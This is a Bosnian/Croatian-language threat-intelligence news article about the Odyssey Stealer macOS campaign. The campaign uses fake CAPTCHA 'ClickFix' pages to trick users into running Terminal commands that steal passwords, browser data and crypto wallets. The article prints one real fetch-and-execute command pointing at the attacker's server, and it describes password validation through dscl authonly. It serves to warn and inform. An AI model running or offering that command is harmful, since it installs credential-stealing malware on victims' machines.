Nova sofisticirana kampanja zlonamjernog softvera usmjerena na korisnike macOS operativnog sistema koristi obmanjujuće “Clickfix” taktike za distribuciju zlonamjernih AppleScriptova, dizajniranih da ukradu osjetljive korisničke vjerodajnice i finansijske podatke. Ova kampanja koristi lažne domene koji se podudaraju sa zakonitim finansijskim platformama i web stranicama Apple App Storea, stvarajući uvjerljivu fasadu koja navodi korisnike na izvršavanje opasnih naredbi na svojim sistemima.
Napad započinje kada korisnici nenamjerno posjete zlonamjerne domene koje prikazuju lažne sigurnosne provjere u stilu Cloudflare CAPTCHA. Ove naizgled legitimne stranice za verifikaciju upućuju korisnike macOS-a da kopiraju i lijepe Base64 kodirane naredbe u svoje terminalne aplikacije kako bi dokazali da nisu roboti. Nakon izvršavanja, ove naredbe pokreću sveobuhvatnu operaciju krađe podataka, ciljajući vjerodajnice pretraživača, kripto novčanike i osjetljive lične informacije pohranjene u različitim aplikacijama.
Istraživači iz Cyfirme identificirali su ovaj zlonamjerni softver kao Odyssey Stealer, preimenovanu verziju ranije poznatog Poseidon Stealer-a, koji je sam potekao kao fork AMOS Stealer-a. Tim za istraživanje otkrio je više komandno-nadzornih panela povezanih s ovom aktivnošću, s infrastrukturom uglavnom hostovanom u Rusiji. Zlonamjerni softver pokazuje jasnu sklonost ka ciljanju korisnika u zapadnim zemljama, posebno u Sjedinjenim Američkim Državama i Evropskoj uniji, dok upadljivo izbjegava žrtve u zemljama Zajednice nezavisnih država.
Odyssey Stealer predstavlja zabrinjavajući napredak u zlonamjernom softveru koji cilja na macOS, kombinujući taktike socijalnog inženjeringa sa sofisticiranim tehničkim mogućnostima. Za razliku od tradicionalnog zlonamjernog softvera koji se oslanja na ranjivosti softvera, ova kampanja iskorištava ljudsku psihologiju predstavljajući korisnicima poznato izgledajuće sigurnosne upite koji se čine kao rutinske procedure verifikacije. Napadači su pažljivo kreirali svoje distribucijske web stranice kako bi odražavali povjerljive platforme, što otežava otkrivanje za nesuđene korisnike.
Mehanizam zaraze zlonamjernog softvera oslanja se na višefazni proces koji počinje sa typosquattingom domena i kulminira sveobuhvatnim kompromitovanjem sistema. Kada korisnici posjete zlonamjerne domene, nailaze na profesionalno dizajnirane stranice koje repliciraju izgled legitimnih CAPTCHA sistema za verifikaciju. Lažni upit prikazuje upute za korisnike macOS-a da izvrše naredbu koja izgleda ovako: `curl -s http://odyssey1.to:3333/d?u=October | sh`. Ova naredba preuzima i izvršava AppleScript sa servera napadača za komandovanje i kontrolu. Skript koristi alfanumeričku obskurnost da sakrije nazive funkcija, iako analiza otkriva njegovu pravu svrhu.
Nakon izvršavanja, zlonamjerni softver stvara strukturu privremenih direktorija pomoću naredbe `mkdir`, posebno uspostavljajući `/tmp/lovemrtrump` kao svoju operativnu bazu. AppleScript zatim prikazuje uvjerljiv upit za autentifikaciju dizajniran da zarobi korisnikovu sistemsku lozinku. Za tihu validaciju ukradenih vjerodajnica, koristi macOS `dscl` naredbu s parametrom `authonly`, osiguravajući da proces verifikacije ostane skriven od korisnika. Ova tehnika omogućava zlonamjernom softveru da potvrdi ispravnost lozinke bez pokretanja sistemskih upozorenja ili sumnje korisnika, demonstrirajući duboko razumijevanje napadača sigurnosnih mehanizama macOS-a.
